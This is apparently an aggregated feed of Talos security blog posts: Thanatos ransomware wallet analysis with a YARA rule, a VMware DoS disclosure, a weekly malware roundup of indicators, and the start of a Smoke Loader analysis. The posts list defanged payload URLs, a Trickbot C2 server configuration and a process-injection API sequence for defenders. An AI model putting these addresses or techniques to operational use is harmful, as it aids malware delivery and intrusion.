As previously mentioned, throughout the various Thanatos campaigns and associated samples, the attacker behind this threat made changes to the types of cryptocurrencies that they claim are supported for paying the ransom demand. Analysis of these various wallets and associated cryptocurrency transactions revealed some interesting information about the size and success of these malware campaigns over time. Across all of the samples, the following cryptocurrency wallets were listed along with instructions for paying the ransom on the ransom note accompanying the malware.

Bitcoin ($BTC):
1HVEZ1jZ7BWgBYPxqCVWtKja3a9hsNa9Eh
1DRAsxW4cKAD1BCS9m2dutduHi3FKqQnZF

Ethereum ($ETH):
0x92420e4D96E5A2EbC617f1225E92cA82E24B03ef

Bitcoin Cash ($BCH):
Qzuexhcqmkzcdazq6jjk69hkhgnme25c35s9tamz6f

ZCash ($ZEC):
t1JBenujX2WsYEZnzxSJDsQBzDquMCf8kbZ

In analyzing the bitcoin wallets, we identified that the attacker had not received a single ransom payment from victims. In fact, the wallet listed most frequently across the samples analyzed (1HVEZ1jZ7BWgBYPxqCVWtKja3a9hsNa9Eh) was not even a valid bitcoin wallet. This means that even if a victim tried to pay using bitcoin, they would have been unable to. The second wallet (1DRAsxW4cKAD1BCS9m2dutduHi3FKqQnZF) did not have a single transaction to or from it.

Likewise, the Bitcoin Cash wallet that was listed has also never seen a single transaction.

When analyzing the Zcash wallet that was seen listed on one of the ransom notes associated with Thanatos, we identified that while it had seen several transactions, the total amount of ZEC received by this wallet was 2.24767084, which equals approximately $450 USD.

Finally, the Ethereum wallet used by the attacker also saw several transactions. However, the total amount was also low compared to some of the more successful ransomware campaigns we regularly observe across the threat landscape. The total amount of ETH received in this wallet was 0.52087597, which equals approximately $270 USD.

This means that across all of the samples seen in the wild, the attacker's wallets had only received a total of $720 USD. If the incoming cryptocurrency was directly related to victims paying a ransom as a result of Thanatos infections, this clearly did not generate significant revenue for the attacker when compared to other financially motivated cybercrime operations.

Conclusion

Whether for monetary gains or to destroy data, attackers are continuously targeting end users. This malware proves how easy it has become for anyone to target users. You do not have to be a sophisticated attacker to cause havoc. There are also an endless supply of attack vectors available. In this case, for instance, the attacker took advantage of the Discord chat platform. Therefore, it is important to take security seriously and take steps to secure your systems, whether they are used for personal or business purposes. Since many of these attacks take advantage of users, you also need to be careful when opening attachments from unknown sources or clicking on unknown links.

Coverage

Additional ways our customers can detect and block this threat are listed below.

YARA Signatures

Talos is also providing the following YARA signature that can be used to identify samples associated with the Thanatos ransomware family.

rule Thanatos

{
        strings:

        $s1 = ".THANATOS\x00" ascii
        $s2 = "\\Desktop\\README.txt" ascii
        $s3 = "C:\\Windows\\System32\\notepad.exe C:\\Users\\" ascii
        $s4 = "AppData\\Roaming" ascii
        $s5 = "\\Desktop\x00" ascii
        $s6 = "\\Favourites\x00" ascii
        $s7 = "\\OneDrive\x00" ascii
        $s8 = "\\x00.exe\x00" ascii
        $s9 = "/c taskkill /im" ascii
        $s10 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run" ascii

        condition:
        6 of ($s1, $s2, $s3, $s4, $s5, $s6, $s7, $s8, $s9, $s10)
}

Indicators of Compromise (IOC)

File Hashes (SHA256)

bad7b8d2086ac934c01d3d59af4d70450b0c08a24bc384ec61f40e25b7fbfeb5
fe1eafb8e31a84c14ad5638d5fd15ab18505efe4f1becaa36eb0c1d75cd1d5a9
8df0cb230eeb16ffa70c984ece6b7445a5e2287a55d24e72796e63d96fc5d401
97d4145285c80d757229228d13897820d0dc79ab7aa3624f40310098c167ae7e
55aa55229ea26121048b8c5f63a8b6921f134d425fba1eabd754281ca6466b70
02b9e3f24c84fdb8ab67985400056e436b18e5f946549ef534a364dff4a84085
241f67ece26c9e6047bb1a9fc60bf7c45a23ea1a2bb08a1617a385c71d008d79
0bea985f6c0876f1c3f9967d96abd2a6c739de910e7d7025ae271981e9493204
42748e1504f668977c0a0b6ac285b9f2935334c0400d0a1df91673c8e3761312

URLs

hXXps://cdn[.]discordapp[.]com/attachments/230687913581477889/424941165339475968/fastleafdecay.exe
hXXp://iplogger[.]com:80/1CUTM6
hXXp://iplogger[.]com:80/1t3i37

User Agents

Mozilla/5.0 (Windows NT 6.1) Thanatos/1.1

↧

Beers with Talos EP 32 - Live from Orlando Part 2: Take All the Things Off the Internet

June 27, 2018, 1:32 pm

≫ Next: Vulnerability Spotlight: VMWare Workstation DoS Vulnerability

≪ Previous: Files Cannot Be Decrypted? Challenge Accepted. Talos Releases ThanatosDecryptor

Beers with Talos (BWT) Podcast Episode 32 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast.

Ep. 32 show notes:

Recorded June 13, 2018 — Still live in Orlando, just this time from the lovely lobby bar at the convention center hotel. We are joined by Lurene Grenier to dig a bit deeper on her keynote from the Talos Threat Research Summit. Lurene is here to give you the offensive view of attacking your network. If you want a hot take on defense from someone who is pure offense, well… buckle up and break out your cord-cutting scissors. You are already saying “We can’t do that!” Lurene is telling you that if you decide to take this seriously enough, you can and should.

The timeline:

The roundtable

01:10 — Nigel: Reduced to looking forward to Liverpool’s schedule release day
02:18 — Joel: Already checked out and is mentally at Harry Potter World
03:12 — Craig: Not paying attention
03:47 — Matt: Meet Lurene
05:16 — Lurene: No free keynotes, and how to play the “don’t call the police” game

The topics

10:27 — Honestly, we are here for one purpose and topic today: Lurene’s defensive mantra, which she calls "Take Your S***t off the Internet." This is where we spend the whole show. If you are interesting to a major actor and you are taking things seriously, the only truly safe play is taking all your pieces off the board. If you don’t, someone else will.

The links

No links. Weren’t you listening?

==========

↧

Vulnerability Spotlight: VMWare Workstation DoS Vulnerability

June 29, 2018, 7:28 am

≫ Next: Threat Roundup for June 22-29

≪ Previous: Beers with Talos EP 32 - Live from Orlando Part 2: Take All the Things Off the Internet

Today, Talos is disclosing a vulnerability in VMWare Workstation that could result in Denial of Service. VMWare Workstation is a widely used virtualization platform designed to run alongside a normal operating system, allowing users to use both virtualized and physical systems concurrently.

TALOS-2018-0540

Discovered by a member of Cisco Talos

TALOS-2018-0540 / CVE-2018-6965 is an exploitable Denial of Service (DoS) vulnerability in the VMWare Workstation 14 software. The vulnerability lies in the pixel shader utilized by VMWare Workstation and can be triggered by supplying a malformed pixel shader in either text or binary form inside a VMWare guest operating system. This vulnerability can be triggered from VMWare guest or VMWare hosts and results in a process crashing leading to a DoS state.

For more technical details, please read our advisory here.

Tested Software:

VMware Workstation 14 (14.1.1.28517)

Coverage

Talos has developed the following Snort rules to detect attempts to exploit this vulnerability. Note that these rules are subject to change pending additional vulnerability information. For the most current information, please visit your Firepower Management Center or Snort.org.

Snort Rules: 45981-45982

For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: http://www.talosintelligence.com/vulnerability-reports/

To review our Vulnerability Disclosure Policy, please visit this site:

http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html

↧

Threat Roundup for June 22-29

June 29, 2018, 8:42 am

≫ Next: Smoking Guns - Smoke Loader learned new tricks

≪ Previous: Vulnerability Spotlight: VMWare Workstation DoS Vulnerability

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 22 and June 29. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this round up are:

Win.Trojan.Remcos-6591502-0
Trojan
Remcos is a commercial RAT but it is also available for free with few functionalities. It can be configured to have anti-vm checks and hinder the analysis. This family is able to receive and execute commands from a C&C server. The commands may activate and record the microphone and the camera as well as the keylogger functionality. Remcos is spread with aggressive spam campaigns and by leveraging Word/Excel macros.
Win.Malware.Separ-6591487-0
Malware
This family is a spyware delivered via spam campaigns. The malware survives reboots and is able to collect confidential information by capturing login attempts. It disables the Windows firewall and it invokes scripts and has also FTP functionalities to upload the collected data.
Win.Malware.Tspy-6591475-0
Malware
Tspy family is a malware with several functionalities. It is able to execute itself after every reboot and in this way it is persistent. It contacts domains that are related to RATs and are generally C&C servers to upload data and receives additional commands. The samples are often packed and contain anti-debug tricks to complicate the manual analysis.
Win.Malware.Jaik-6591471-0
Malware
Jaik is a botnet with several functionalities. The samples are able to communicate with domains and perform code injection into other processes. The malware has many features and some samples have also DDoS capabilities as well as generic credential harvesting.
Win.Malware.Delf-6591417-0
Malware
This family is a generic malware and it is generally the first step of a more deep infection. The payload once executed on the machine downloads and runs new binaries. The malware is interested in credentials and focus its attention on well known applications such as Outlook, Thunderbird, Firefox etc.
Win.Malware.Ursu-6591377-0
Malware
Ursu is a generic malware and it has many functionalities. It contacts and C&C server and performs code injection in the address space of legitimate processes. It is able to achieve persistence as well as to collect confidential data. It is spread by email.

Threats

Win.Trojan.Remcos-6591502-0

Indicators of Compromise

Registry Keys

Mutexes

IP Addresses

Domain Names

Files and or directories created

%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive0.dat
%System32%\winevt\Logs\Windows PowerShell.evtx

File Hashes

0007bb868ae54ff5be81cf04d7ff4c38c1d36ee18fbc3ee166d1f6298b8e4176
00171a400fb86b6f6489875fdf65079b765255e2240c30f174b1f9aff6a17dac
04bb108e21aaa1b3832e2ff483237559c02dda2ddfc03e2b56e7bc818614d0e4
074dcfd66274bec7d3ac3e23fd77d21baca17efa497eb94d748e46add97e8c27
07b31ec3eabb4967f7ed54d437de2d4a3e9271810f4f9c2b238bb6ba7829f180
0913592e52b43087d0f2a23700e5c625c0cdd4d391354233dc692a5477416ca9
094e5d7bce863dcf7652873c15d18dfce918eca631c471bbe59f739fccb770c8
09a7a2aeb1af80aa666c5920765e4409e367a051c161d948f1a193adbe5040a3
0e953857e78b91fa30011d345fccf6f86a8697318935b227d69ac4dd4915889b
10173267784ffb1934d59ce8bd822f9f9260bbc7420eeafd0c8affa8a62e840b
1323533b1caa1537b50c0ddb43b5f692901d2bb3b38f11e0fb380d72149ef53d
13aeccc984e1570bf36d8440df9b293277b25f26bb299179d187ac47b3500488
13fbdc096406f0f975d02a160448d98fd9d49d3ce7d338151668001017dbe397
144b7841ed6f8181b99e6be48533a77db7ec1183cd3700fecda0cfdc4b5bf3bb
1623edf8271a3a77d74658adcf67d5f99f6102bf178c0665dd68bc932b0c1228
192f60438d4707d0edb60c2ab1b69df72943b7812bd77bb393182db0636be982
1a6c169c82fd99a1b607100c42cae0c39f964ea2dbe6e0216479171d479275df
297ce1753eb30ecc82b016aac7ab694eb0bd4ded06fdecc5cd42a2464e4831db
2a0d2df8c466bbe5bf538e9745286f124f3ca426d3ece80fbb675863281c46a5
2a4a9722a20800038438c88d240083b65c729004d30e0c993f67202541f60811
2a67165161c7cbeed1fb43aa27b770b627b0eabe7a647387382fa4cff0acbaa3
2bbed3835b0efc4efe05d8fc806ab9fa5313202d566d18060542d23a3cb80fed
2d834a721aa72e59378d795f16b179e6cc8fc0040441d72b293f19d863cd22ad
318d9318e4e204f378f8ffeb7d831a6f251d6ca4e827f8e48449be0812e2cb25
31aa91dfa01203239b8aa25649c05a084e62de8814e101c24f3fbd5f2d234014

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Separ-6591487-0

Indicators of Compromise

Registry Keys

<HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
<HKLM>\System\CurrentControlSet\Services\NapAgent\LocalConfig
<HKLM>\System\CurrentControlSet\Control\DeviceClasses
<HKLM>\Software\Wow6432Node\Microsoft\Windows Script Host\Settings
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\EVENTLOG\APPLICATION\CHROME
- Value Name: CategoryCount

Mutexes

RasPbFile
DILLOOEP
DILLOCREATE
RAL716BCAD1
Global\GS-1-5-21-2580483871-590521980-3826313501-500{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}

IP Addresses

198.23.57.8

Domain Names

ftp.freehostia.com

Files and or directories created

ZREA.vbs
\wkssvc
BReader.exe
aijw01.bat
Adobeta.exe
adip2.klc
adbr02.ght
adbr01.ght
870.afr
%WinDir%\TEMP\gui9381.tmp
%WinDir%\Temp\gui9381.tmp
%WinDir%\TEMP\Crashpad\settings.dat
%WinDir%\TEMP\Crashpad\reports
%WinDir%\TEMP\Crashpad\metadata
PSTools\PsExec.exe
\scripts\PSTools\PsExec.exe
sendemail\sendEmail.exe
sendemail\sendEmail.pl

File Hashes

0426b3265ac921a904ba9a2a4e23bf86c18863bd020f1b50b4b1f85eafed66c4
09ebe700700a0e5e49d994093786f6c1bc9d3c400edc94b31693ef5961250d81
12e2ba4b4a310edf9cd97405541565e20d9ea6259d86d96a36fc8b676babb228
14c4a3fd18cad81c55ff4aa192803b748d8810900602c89c26114eb80c9db988
21d006b8f12a6b2e3126f3a6cef4f621c314a9dc21be6ffe51950f816f6a88c9
306d1f5e2b8292344d86d611dff2704920fa44ddd6fdc0b67a3e7e0f34d29d18
354cf3031b2679f885969746afef780bb1765b0f32613afb6490d5e60b7fe6bc
3ef31d4a0bccee0994a4ee525b679da1fd2664f3d96d20371297f6f6645a2ced
3f735ba16d51af841f5a48c9be5a2cb004df275c71cbbdd3497bfe34460f9c93
403d91b31d44acb4a67b5b0dd7679971bedc722244f1b705adfa095632d18cf3
4f7b768262e30ac52c97566a03646de84081ea148c932aedb84ca5bb46a10da0
5b4afe3563869522e85cfab2ae3d2e57a55f98a9c565c915dac81aaa0282deb4
61540809d55eaa23ba0ac82ff4b530823c93fbc8e7097ccaeb8329e0eb1e48c1
64a76e220bdff00633c5cd8e0282ec61836a60cf6b2f9f1b135ce3a3b040ca52
675402f0a4a31c59011e4356207a3189b171f0dd81b0117adf59e6e120b90295
6d7019e4f1e02713046fedb121d15c9a423b8502e792ff42c7896c3b4d9f826d
6df2b4fc352d822b4df9c164e7282fe387adc6ab0b7e036a12f4c3c57641564d
6f13c5e83ae42cbb755a44c3c45075043983d0eba2846b63442471577bdf6a98
70a30928df9e590846105947070d1fde660aa4bb933e0468713a89960c587a9f
7115ea1ab97a7187b2a1bb6936fe3df44bc754ec06f70c9f880d9787e605ea60
79789706985bcb5afeffed63805994cbe09966da0544e18a0a059a57064d7039
7e4ed04b95f0b07272223308b8e49db2fd64b144db28d5322b51ae879f58f8aa
7eefcb90a82546e4b71895a11a95a8dc38f49fe4713fa7d7a52ec68f511533cd
81ca06e244e541b585ff763df011560dc2b58eb7ea434eeef74439ca8bfd01b2
82a5963922e08c70521648fbec9849f621bfd0d25b0d6193b1e9a39ecab05111

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Tspy-6591475-0

Indicators of Compromise

Registry Keys

<HKLM>\SOFTWARE\MICROSOFT\RAS AUTODIAL\Default

Mutexes

3749282D282E1E80C56CAE5A

IP Addresses

207.174.215.154

Domain Names

azmiry.com

Files and or directories created

\samr
%WinDir%\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat
\lsass
%AppData%\D282E1\1E80C5.lck
%AppData%\D282E1\1E80C5.lck

File Hashes

05a6a94d66a8b222553c9210b4e370d02a6fffe8ee49be8142d75dd37c5c7fab
0f11515c0a57068b0636a8a4283b8e25bf7c72fe55c486fc108a8cbf02b50c41
16ae2ef60aad481f1a340a9e6e7421258a57e7cbba46d9dca8c1dc063a699ef3
19c97ae2501ccebf5e2e4e5f88d3323141aeca73e9016d69eacc11f79fd4e803
1d8cda39dcf193f04d41ca364e038ddf7ae51ff5cabc56c687a38c41773b5d95
2ec87871a0a83639fc814ab764d69147f2dccc13cdcd6dd6af4a9aaaebdb5283
3651567230a6f02d69659133e1e915d87903994f20ac3108310c214d9cab163c
36f23f39d5bf737e10c2a253f046741f530ebabe20216ec535b3aab4bc9efe5c
4ec361e23ab8e05a13532c2c669bf8a37adb1e918124b308f83e3ed59a4c2abc
4ed4a8509a45db8c5ff416c738cb25a877b47bd1066b30b1c611644f92b051d6
4f44cbd14878c3f8d6415c0d7d103224354323d624ef3e0906f3695d3c9c06e9
505086a1799dc039d72a0e691641af6660ed9b2b97e7ff9b1379b59971fc9701
574e0c9876b887373cb06e5873f99decb58c10e97d87f930b86d4156a4585e97
5b037ffcf5d7627fd5e722fa9b24f9a7108fd65069f47bed25e0c72618450774
61847bfbc04c932876fa453db940c2ae04c71476f4852f1799fd1de2e8a649af
6dba2d229e5170601495ae923bff1f46ec581b6d858bc2b19a8db3ed210b8791
7a93669bdf9192314b505e49e3d80e3974683a024f12f92ba0103e8b640a7d2d
7e113d90f3f9a6dff9a99479d7377ee1b19fa3534ba3874c98495cc8b5ef3a3e
86d5dff17cefb0f8c99c92a4e5890086d2674ccfb46ad80bf202df6961ed5d4b
87f83003dbefa877b6256c34ceddb4447880d4db632656a3718fea5a0428515d
9617d56a748b5f29e7e97260fb61ee99b9035521ec4e4d134fad9411e74d950b
b29235fc7596b5ba81c8edac236b03e8ab86b0457297151b4f410277939f12ee
c421dd4f20f4b7d99e740352db8e727a0b3c88c34ab2053849f039b508d73f71
d454f075a83bd4d4541ed25898a4cb8ac5ef903b5b4269790a911450ff0a76ff
ea09bb3b764c057f45134b132793654e0937701d4cc731298cc7791b1e1b1b88

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Jaik-6591471-0

Indicators of Compromise

Registry Keys

<HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters

Mutexes

IP Addresses

Domain Names

meteor1174.hopto.org

Files and or directories created

File Hashes

07bef3ef1d45fe1bbc7c16f7e7ad211e1e81264cf9ef119232d10bfd2245e778
2ae2fcade0f57faf7fbabbde56e60ad080df9011ed70dee957aa7fe13a961c80
2bab01741cc5796155d61543a7efe5cdfa96bde3507f1d85ea2c96ec0f1f7c0b
3329a848c569b7048f60a733cdf217d84baa1820fb4c1c423662e799fa1b9331
36ac6881149050ac9aec57972ccc3e8063c51e66529d16b0a2647b9ab8700715
49646325555c83e70ced5a1b4b2ef7f128ff912593c95c017703f332c83e0914
58a9f5613ece73717b322ab7518d887fdd391011cef6afbcb311eef74b677df9
5c20c7e6b9aa1dacafff644088c71388374329a9e0a218fdc944fb802fc5928c
5eb6c33a3e6dbf7067de22799ef42d58fc8696f74a29bef655993508e9b9d018
622fa10ffe94bff99be638991472cbfda178d186d6d95adc2bb87c39d2f9c1fb
709da9c32f18848efbd955bef0d1717a5adf56435a3bf0d1fdac34aeab25b725
70e53202023b2615c92a7987590161ab2a18410e827a6535ffc1df83eec6821d
ab551f56024f9443b83107091fe741ab301052c03c34c167717f781f9fab36a7
ad459b9f19ce38d60470ed2889895d23f618f2be1aae8e49b172e83faa69c2c4
af9f5370fa6758440ef40215c4412b1b266c33effc541c97766b7c6f4dd076b8
d0a55070ae9fdb2b7ac3b113025200257d4e02c223606038e5f19e963bf2c9e4
db5025e926aefee22c19bea499ed4e79c8d28dac511ac82016823a34ae9f20b3
e35cda507a9d6fc95a409f8e9946bae206a02063d51296017d82382ff28ead88
ec67e3754964d9c2ffb67837cf56eacdd51557012e31014fcbf29a01254d6fe5
f10fd36eb803b00e3173b20a2c19fc99a82a51fdecb7eb5b41417ca8365a98c4

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Delf-6591417-0

Indicators of Compromise

Registry Keys

<HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
<HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
<HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion
<HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings
<HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\
<HKLM>\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\20.0.1 (en-US)\Main
<HKCU>\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook_2016\

Mutexes

S-1-5-21-2580483-2483680211483
8-3503835SZBFHHZ
O40QO-SR7BC0x74z

IP Addresses

162.255.119.150
93.89.226.17
198.54.117.212
50.63.202.36
52.5.103.164
54.80.160.147
184.168.221.32

Domain Names

www.exodusenerlytics.technology
www.davenunn.com
www.bkinfoprosdiscountworld.com
www.szccf360.com
www.diligence.agency
www.curry.estate
www.nordraack.com
www.titandevelopmentgroup.com
www.iqtlab.net
www.dem45.com
www.sinevizyonajans.com

Files and or directories created

\TEMP\tmp8gR_uW.exe
%ProgramFiles% (x86)\Nldp\colorcpl8pjxn.exe
%AppData%\O40QO-SR\O40logrv.ini
%LocalAppData%\Temp\Nldp\colorcpl8pjxn.exe
%LocalAppData%\Temp\Nldp\colorcpl8pjxn.exe

File Hashes

05e73d8ba52f08aec1a2ef518882919038bafc5de2ed55d392b6ccea42ea2dd3
09a45c4027bda13479438300bc335bce71d55867062c959c73ce5403ff00c612
0b23ebf80d0733874699afe7ce80553b6b4a61a1e624e1e07b623b51f7860691
0d0f137cb556858c93f1997cbaca1be7cf6ef24cb727fae6a0c803960c584eb0
14a68cb7a2930e6646657e26dd45fb5a78516756b7109ee12003bcdc822ad9a6
173fbe68a341e3ee14ae0d1b28668200573f48062621e76ca5dda051effd4e05
17fec1525d222eee566d9659723e31758615f38f11737f92e553bcbd1e38536b
1bd6c972c2e3d832da416d007c99a29c262eae2e8f33fe01a8a21e28351e35cb
23387c5a36e1238a0c7d0c2d5e085104633c5d241b640ce5c0c141298e690bb6
253a4ae4cbf315b3b22bb9c17dc10c56ebeb81a9b5b9f7914f6fa5fd427b5f06
28ba614d48c8193e3281dd382b2e20572ec74dd1f3566aa587f8b4f3e245a7a0
2b2ef2273c974fb2645c6f89780f227f9361f3d70ea7c016ce04cb9723d8b35a
2bf9a152694a78137a1a65528ba0ec59d4d104353ff8546e81f95dc93c057836
2c5b196d892dc0ced1b53bab03a485b7b8e82bc94a8f3117ab4eed0eca98d1a2
2cfce9a60463f25ce69d2a0ed56e026db274be7d55215c8dd02de6df6e9b51a4
31c70b829486f54898eb15bb28dfcf2c56f3860a9dca3872ddf2c1b0a8f52e99
31e7fd07d03a0e11510f49056d99252abfaa1cc326ded44fe8c3b21a22fde5f9
3342fab27758ae8bd7acb18aa622b0c0e2cc5425b38c404059f742eaa5c437ee
34058b038b01acf371ff2124cc8090c078514cb90bc40aa71e6147cafe9323e3
39b16f474008113649b0177624a320ce91b7522c791985eee9c044aabb888802
42635253472eab8f4e242db7705ba5de5ab3088bb6d366696219974ed2817383
4292e8ecea77bd64adb39b58e02c24745d52485c376a1f950aa5adc2e8a3cc44
4372ad95f57701da72c2fd9e191beef564d613d473a53cb3034eab407229eb8f
441d9da5829e5e263ef7c0bd43dc097d6e4221273be576072335e8c3226d7309
44d6b38d0cfac3a4f96c2c65997d203fa6d45b8de07fcf0908ca6eb8771d5286

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Win.Malware.Ursu-6591377-0

Indicators of Compromise

Registry Keys

<HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
<HKLM>\System\CurrentControlSet\Control\DeviceClasses
<HKLM>\Software\Microsoft\RAS AutoDial

Mutexes

3749282D282E1E80C56CAE5A

IP Addresses

104.27.133.70

Domain Names

saferfreedom.tk

Files and or directories created

%AppData%\D282E1\1E80C5.lck
%AppData%\D282E1\1E80C5.lck

File Hashes

00671219067cecc386d3b250b4ff757a5497a4b3722aeb0dd3befe3b452d422d
04a91380d6eb48d9f2379fc2cac383dbe259144966206869dda719a66242bf0b
095244d601513670f12b135767eefc69bb321a36d04c2a2f930631dc972bf2fa
2551d70b3860021190a1261539cc7f95fe9a9e4e38491f3c57f7547ad8e908a3
3c19f663bd6a3e2bc4a9532d087b8df17e2b2ac13c601b61cdbb484df6573210
55e214ccca87524499ce3b9cda713412671acc465fd89d37e05aeed883235e67
7b298711a73ca51baa7ae7150b70e0be7753e8cdf1ec0cfd051a59f30e4b0676
848b95a4454433a35d600de4fca65d177daf06c0c049d7c8e0419cca7145e0b9
afe462e1e36845bb140053d0697d30df68228b57657451d31807ffb6596189ac
b126c7530385ff1842b2db06161ee5cb09afc368d486f679b6e88bf62199ed34
b961c0416728d78d875807fce6313c1eafecffde4d0b586227498edc09b8bc35
ba0e40371cefac1880961c60a33c54f1cca57e883da1a603df04f162941f9b28
bff4edac75f61c111017c92e248e977adf795afee9e8b9b4dad9accb5650060c
d1ede616a2a66853bdf7603f56f4e128e722883a2ef4b9b54de8d2fd1e79f3b6
d69ece607dc234195e07a4df139aaa83b8958b3ac3bcaee1d1af19f22b1ee049

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

↧

Smoking Guns - Smoke Loader learned new tricks

July 3, 2018, 3:00 am

≫ Next: Threat Roundup for June 29 to July 6th

≪ Previous: Threat Roundup for June 22-29

This post is authored by Ben Baker and Holger Unterbrink

Overview

Cisco Talos has been tracking a new version of Smoke Loader — a malicious application that can be used to load other malware — for the past several months following an alert from Cisco Advanced Malware Protection’s (AMP) Exploit Prevention engine. AMP successfully stopped the malware before it was able to infect the host, but further analysis showed some developments in the Smoke Loader sample resulting from this chain of malware that intrigued us. This includes one of the first uses of the PROPagate injection technique in real-world malware. Besides a report released at the end of last week describing a different RIG Exploit Kit-based campaign, we haven’t seen real-world malware using this.

Talos is very familiar with Smoke Loader. For example, it was used as a downloader for a cyberattack that was launched using the official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM) in January.

Similar to many other campaigns, the initial infection vector was an email with a malicious Microsoft Word document attached. The victims were tricked into opening the attachment and enabling the embedded macros. This started the malware-downloading chain, down to the final Smoke Loader infection and its plugins.

Smoke Loader is primarily used as a downloader to drop and execute additional malware like ransomware or cryptocurrency miners. Actors using Smoke Loader botnets have posted on malware forums attempting to sell third-party payload installs. This sample of Smoke Loader did not transfer any additional executables, suggesting that it may not be as popular as it once was, or it’s only being used for private purposes.

The plugins are all designed to steal sensitive information from the victim, specifically targeting stored credentials or sensitive information transferred over a browser — including Windows and Team Viewer credentials, email logins, and others.

Technical details

Infection Chain

As mentioned above, the infection chain started with an email and an attached malicious Word document (b98abdbdb85655c64617bb6515df23062ec184fe88d2d6a898b998276a906ebc). You can see the content of this email below.


Fig. 1 - Phishing Email

The attached Word document had an embedded macro that initiated the second stage and downloaded the Trickbot malware. (0be63a01e2510d161ba9d11e327a55e82dcb5ea07ca1488096dac3e9d4733d41).

Fig. 2 - Email attachment: IO08784413.doc

This document downloads and executes the Trickbot malware from hxxp://5[.]149[.]253[.]100/sg3.exe, or hxxp://185[.]117[.]88[.]96/sg3.exe as %TEMP%\[a-zA-Z]{6-9}.exe. These URLs have served up multiple malicious executables in the past, including samples of Trickbot.

In our Trickbot cases, the malware finally downloaded the Smoke Loader trojan (b65806521aa662bff2c655c8a7a3b6c8e598d709e35f3390df880a70c3fded40), which installed five additional Smoke Loader plugins. We are describing these plugins in detail later in the plugins section of this report.

Trickbot

(0be63a01e2510d161ba9d11e327a55e82dcb5ea07ca1488096dac3e9d4733d41)

Smoke Loader has often dropped Trickbot as a payload. This sample flips the script, with our telemetry showing this Trickbot sample dropping Smoke Loader. This is likely an example of malware-as-a-service, with botnet operators charging money to install third-party malware on infected computers. We haven’t analysed the Trickbot sample further, but for your reference, we are providing the Trickbot configuration here (IP addresses redacted with bracketed dots for security reasons.):

<mcconf>
<ver>1000167</ver>
<gtag>wrm13</gtag>
<srv>185[.]174[.]173[.]34:443</srv>
<srv>162[.]247[.]155[.]114:443</srv>
<srv>185[.]174[.]173[.]116:443</srv>
<srv>185[.]174[.]173[.]241:443</srv>
<srv>62[.]109[.]26[.]121:443</srv>
<srv>185[.]68[.]93[.]27:443</srv>
<srv>137[.]74[.]151[.]148:443</srv>
<srv>185[.]223[.]95[.]66:443</srv>
<srv>85[.]143[.]221[.]60:443</srv>
<srv>195[.]123[.]216[.]115:443</srv>
<srv>94[.]103[.]82[.]216:443</srv>
<srv>185[.]20[.]187[.]13:443</srv>
<srv>185[.]242[.]179[.]118:443</srv>
<srv>62[.]109[.]26[.]208:443</srv>
<srv>213[.]183[.]51[.]54:443</srv>
<srv>62[.]109[.]24[.]176:443</srv>
<srv>62[.]109[.]27[.]196:443</srv>
<srv>185[.]174[.]174[.]156:443</srv>
<srv>37[.]230[.]112[.]146:443</srv>
<srv>185[.]174[.]174[.]72:443</srv>
</servs>
<autorun>
<module name="systeminfo" ctl="GetSystemInfo"/>
<module name="injectDll"/>
</autorun>
</mcconf>

Smoke Loader packer/injector details

Malware frequently iterates through process lists to find a process to inject. Security researchers know this process well and have created many tools to track the Windows APIs used in this technique, like CreateToolhelp32Snapshot. This Smoke Loader sample avoids iterating through process lists by calling the Windows API GetShellWindow to get a handle to the shell’s desktop window, then calling GetWindowThreadProcessId to get the process ID of Explorer.exe.

Smoke Loader then uses standard injection API to create and write two memory sections in Explorer, one for shellcode and another for a UxSubclassInfo structure to be used later for PROPagate injection.

GetShellWindow -> GetWindowThreadProcessId -> NtOpenProcess -> NtCreateSection -> NtMapViewOfSection x2 -> NtUnmapViewOfSection

The window handle retrieved from the previous call to GetShellWindow has a second purpose. Smoke Loader uses EnumChildWindows to iterate through each of the handle’s child windows to find one containing the property UxSubclassInfo, which indicates it is vulnerable to PROPagate injection.

PROPagate injection was first described by a security researcher in late 2017, though there were no public POCs available when Smoke Loader started using it. The Smoke Loader developers likely used publicly available notes on PROPagate to recreate the technique.

Fig. 3 - PROPagate Injection

